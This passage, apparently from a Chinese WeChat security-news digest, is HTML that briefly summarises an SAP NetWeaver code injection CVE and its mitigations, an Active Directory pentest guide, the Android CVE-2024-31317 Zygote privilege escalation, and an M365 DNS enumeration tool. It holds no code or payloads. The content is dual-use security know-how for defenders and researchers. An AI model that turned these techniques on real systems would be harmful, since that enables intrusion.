		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAD8StBiadhcG3LljbCcGMgoqiceoyanfk3sazvtRyVZmSJCjGfENeaBQg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAD8StBiadhcG3LljbCcGMgoqiceoyanfk3sazvtRyVZmSJCjGfENeaBQg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1525445415425212"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该代码注入漏洞对 SAP NetWeaver AS Java 系统构成严重威胁，需要立即应对。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过限制文件上传类型和激活病毒扫描配置文件，可以显著降低漏洞利用的风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">管理员应该优先考虑升级系统、配置病毒扫描以及调整用户角色来提高安全性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">除了应对已知漏洞，定期进行 SAP 渗透测试也是保障系统安全的重要手段。</section></li></ul>
	<br/>
	<p>🏷️: SAP, 漏洞, 代码注入, 安全更新, CVE-2024-22127</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x08
			 活动目录渗透测试全面指南</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">该网页提供了一份全面的指南，用于在活动目录（AD）环境中进行渗透测试，涵盖了常见的AD端口和服务、各种利用工具和技术、以及后渗透攻击的方法。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.3333333333333333" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=084ed79a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAq8yJ6bbYH8d5qTfAv3KLb0YoBdrC8P3Hfw1JwhJ8icMgpTFcn0jm1tg%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Active Directory 渗透测试指南</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Active Directory 渗透测试指南</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EA3lmxbE6HibCRxRUIuuQel7e24UqCWvCWibl7qd0icDvmicIMia5MJKRq9zw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EA3lmxbE6HibCRxRUIuuQel7e24UqCWvCWibl7qd0icDvmicIMia5MJKRq9zw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8858228248251112"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">网页内容的主要观点是，为了有效地评估和保护AD基础设施的安全，安全专业人员需要深入了解AD的工作原理、常见漏洞以及可能的攻击路径。通过使用提供的工具和技术，可以对AD环境进行全面的安全评估，发现潜在的安全漏洞，并采取相应的安全措施来减轻风险。文章强调了渗透测试在AD安全中的重要性，并提供了实用的指导和资源，帮助安全专业人员在渗透测试中更加高效和有效。</section></li></ul>
	<br/>
	<p>🏷️: 渗透测试, 活动目录, AD, 网络安全, 工具</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x09
			 近期最珍贵的Android用户空间漏洞CVE-2024-31317分析</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要分析了 Android 系统中的 CVE-2024-31317 漏洞，这是一种用户模式下的普遍漏洞，可以用来获取任意用户ID（UID）的代码执行权限，类似于绕过 Android 沙箱，获取任何应用的权限。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EASNjzzFVXtaKlvSvUa11sznWmMk2c3F4nhqklMCibaYFbrx8BNkiaP9rQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EASNjzzFVXtaKlvSvUa11sznWmMk2c3F4nhqklMCibaYFbrx8BNkiaP9rQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5121551422544854"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-31317 漏洞是 Android 用户模式下最有价值的漏洞之一，它允许攻击者获取任意 UID 的代码执行权限，类似于绕过 Android 沙箱。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Zygote 的工作原理和命令注入的方法对于理解和利用该漏洞至关重要。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">在 Android 12 及以上版本中，利用该漏洞变得更加复杂，需要新的技术来解决由于缓冲区预读取优化带来的问题。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过控制 Zygote 参数，攻击者可以实现特权提升，并可能通过 jdwp 协议实现代码注入。</section></li></ul>
	<br/>
	<p>🏷️: Android, 漏洞, CVE-2024-31317, 网络安全, 代码执行</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0a
			 Servicelens：枚举和分析Microsoft 365域名服务</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Servicelens 是一个用于识别与特定域名相关联的 Microsoft 365 域名及其服务的 Python 脚本，通过检查 DNS 记录来分类和总结这些服务。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="2.51" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="400" src="https://wechat2rss.xlab.app/img-proxy/?k=b849bccc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EALUkMlYLf8cqBnYhpf86QDb4bDZNhdeVZFjFIiakkORh6fNJBaQtibLXA%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
